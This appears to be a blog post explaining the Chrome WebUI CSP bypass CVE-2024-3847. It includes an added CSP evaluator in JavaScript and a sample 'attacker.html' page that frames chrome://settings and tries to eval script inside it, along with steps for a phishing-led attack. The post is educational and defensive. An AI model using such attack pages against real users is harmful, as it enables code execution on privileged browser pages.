In early 2024, a security issue, now tracked as CVE-2024-3847, was discovered in Google Chrome. The bug centers around insufficient policy enforcement in Chrome's WebUI and, while marked with *low* severity, it gives us a clear example of how browser security layers—specifically Content Security Policy (CSP)—can sometimes be sidestepped with a carefully crafted HTML page. This post provides a detailed walkthrough of the vulnerability, how it could be exploited, and what defenders should know.
What Is This Bug About?
WebUI components in Chrome are special internal pages (like chrome://settings). Google uses CSP on these pages to keep users safe, blocking things like inline scripts and third-party content. With CVE-2024-3847, attackers discovered it was possible, in rare cases, to trick Chrome WebUI into relaxing its CSP controls, letting forbidden scripts run.
Bug report: Chromium Issue 334481916
Official advisory: Google Chrome Releases
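To make concrete what the CSP on a page like chrome://settings is enforcing, here is an added example (not Chrome's code, and not from this post): a small JavaScript evaluator for the `script-src` directive that models the CSP3 rules deciding whether an inline script or an external script URL may run. The policy strings and URLs are constructed for illustration; the "strict" policy is shaped like an internal page's policy but is not Chrome's actual WebUI policy. It goes beyond the post by also handling nonces, hashes, wildcard hosts, ports, paths and the `default-src` fallback.

```javascript
// Added example (not Chrome's code): a minimal evaluator for the CSP
// script-src directive. Policies and URLs below are constructed for
// illustration and are not Chrome WebUI's real policy.

// Parse "name src src; name src" into a Map of directive -> source list.
// Per CSP, a repeated directive is ignored (the first occurrence wins).
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// script-src governs scripts; when absent, default-src applies;
// when both are absent there is no restriction (null).
function scriptSourceList(policy) {
  return policy.get('script-src') ?? policy.get('default-src') ?? null;
}

// Inline scripts: allowed by a matching nonce or hash, or by 'unsafe-inline'
// when no nonce/hash source is present (CSP3 turns 'unsafe-inline' into a
// no-op as soon as nonces or hashes appear in the list).
function allowsInlineScript(policy, { nonce = null, sha256 = null } = {}) {
  const sources = scriptSourceList(policy);
  if (sources === null) return true;
  const hasNonceOrHash = sources.some(s => /^'(nonce|sha(256|384|512))-/i.test(s));
  if (nonce !== null && sources.includes(`'nonce-${nonce}'`)) return true;
  if (sha256 !== null && sources.includes(`'sha256-${sha256}'`)) return true;
  return !hasNonceOrHash && sources.some(s => s.toLowerCase() === "'unsafe-inline'");
}

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };
const portOf = url => url.port || DEFAULT_PORTS[url.protocol] || '';
const sameOrigin = (a, b) =>
  a.protocol === b.protocol && a.hostname === b.hostname && portOf(a) === portOf(b);

// Does one source expression match a script URL requested by pageUrl?
function sourceMatches(source, url, pageUrl) {
  const s = source.toLowerCase();
  if (s === "'self'") return sameOrigin(url, pageUrl);
  if (s.startsWith("'")) return false;                 // 'none', nonces, hashes, other keywords
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;   // scheme-source, e.g. https:
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^\/:*]+)(?::(\d+|\*))?(\/[^?#]*)?$/);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  // An explicit scheme must match; otherwise the page's scheme is inherited,
  // except that an http page may load https scripts (not the reverse).
  if (scheme) {
    if (url.protocol !== scheme + ':') return false;
  } else if (url.protocol !== pageUrl.protocol &&
             !(pageUrl.protocol === 'http:' && url.protocol === 'https:')) {
    return false;
  }
  if (host.startsWith('*.')) {
    const suffix = host.slice(1);                      // "*.cdn.example" -> ".cdn.example"
    if (!url.hostname.endsWith(suffix) || url.hostname.length <= suffix.length) return false;
  } else if (host !== '*' && url.hostname !== host) {
    return false;
  }
  if (port && port !== '*' && port !== portOf(url)) return false;
  if (path) {                                          // trailing "/" means prefix match
    if (path.endsWith('/')) { if (!url.pathname.startsWith(path)) return false; }
    else if (url.pathname !== path) return false;
  }
  return true;
}

function allowsScriptUrl(policy, scriptUrl, pageUrl) {
  const sources = scriptSourceList(policy);
  if (sources === null) return true;
  const url = new URL(scriptUrl), page = new URL(pageUrl);
  return sources.some(src => sourceMatches(src, url, page));
}

// Constructed demo policies: one strict, in the shape an internal page would
// use (only its own origin and a fixed resources origin), one permissive.
const STRICT = parseCsp("script-src chrome://resources 'self'; object-src 'none'");
const PERMISSIVE = parseCsp("script-src 'self' 'unsafe-inline' *");

// Evaluate the three script loads the post is concerned with for a given page.
function evaluate(policy, pageUrl) {
  return {
    inline: allowsInlineScript(policy),
    sameOrigin: allowsScriptUrl(policy, new URL('page.js', pageUrl).href, pageUrl),
    thirdParty: allowsScriptUrl(policy, 'https://third-party.example/lib.js', pageUrl),
  };
}

console.log('strict on chrome://settings/:', evaluate(STRICT, 'chrome://settings/'));
console.log('permissive on https://app.example/:', evaluate(PERMISSIVE, 'https://app.example/'));
```

The strict policy reports inline and third-party scripts as blocked and only same-origin or `chrome://resources` scripts as allowed; that is the layer the bug in this post is said to weaken, and the check worth keeping in mind is that a single `'unsafe-inline'` or `*` in `script-src` collapses it.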
How Does the Exploit Work (In Simple Terms)?
A remote attacker could send a malicious HTML page that, under the right conditions, tricks Chrome’s WebUI into letting dangerous JavaScript run on a normally protected internal page. This doesn’t mean drive-by attacks are easy—the target usually needs to intentionally interact with a Chrome-internal page.
Still, if you combine social engineering (like phishing) with this bypass, it’s possible to get code running where it really shouldn’t.
Here’s a sample code snippet that demonstrates the kind of attack logic:
```html
<!-- attacker.html -->
<html>
  <head>
    <title>Test Chrome WebUI CSP Bypass</title>
  </head>
  <body>
    <!-- Embed a Chrome-internal page. Chrome does not let ordinary web
         content navigate a frame to a chrome:// URL, so this frame stays blank. -->
    <iframe src="chrome://settings" id="webuiframe"></iframe>
    <script>
      // Try to inject a script into the WebUI iframe
      setTimeout(function () {
        var iframe = document.getElementById('webuiframe');
        try {
          // Normally this throws a SecurityError: the frame is cross-origin,
          // and the WebUI page's own CSP forbids inline and eval'd script.
          // The CVE is what would let that CSP be relaxed.
          iframe.contentWindow.eval('alert("CSP bypassed!");');
        } catch (err) {
          // Will typically fail, but with the bug this could work
          console.log("Couldn't inject:", err);
        }
      }, 200);
    </script>
  </body>
</html>
```
> Note: In the real world, the exploit often requires more subtlety (different WebUI targets, tactics to get privileged frames, etc.), but the basic idea is tricking the browser into ignoring its own security rules.
1. Attacker sends the target a link to a website with the crafted HTML page.
2. The page loads a Chrome WebUI page (chrome://settings) in an <iframe>.
3. The exploit tries to run JavaScript on the Chrome-internal page, bypassing normal CSP protections due to the bug.
4. If successful, the attacker’s code runs with the privileges of the WebUI page, which can do more than a standard web page.
Why Is It “Low” Severity?
- The attack *usually* needs the victim to visit a malicious site and interact with a Chrome-internal page.
More Reading
- Chromium Issue 334481916
- CVE Record for CVE-2024-3847
- Google’s Patch Announcement
- Content Security Policy (MDN)
Conclusion
CVE-2024-3847 might not be a blockbuster exploit, but it’s a solid reminder of how even “internal” browser pages can become attack targets. For browser security, every layer (like CSP) matters, and staying updated really is the best defense.
*Know your tools, update often, and don’t underestimate “low” severity bugs—they’re often stepping stones for bigger attacks later!*
Timeline
Published on: 04/17/2024 08:15:10 UTC
Last modified on: 07/03/2024 02:06:43 UTC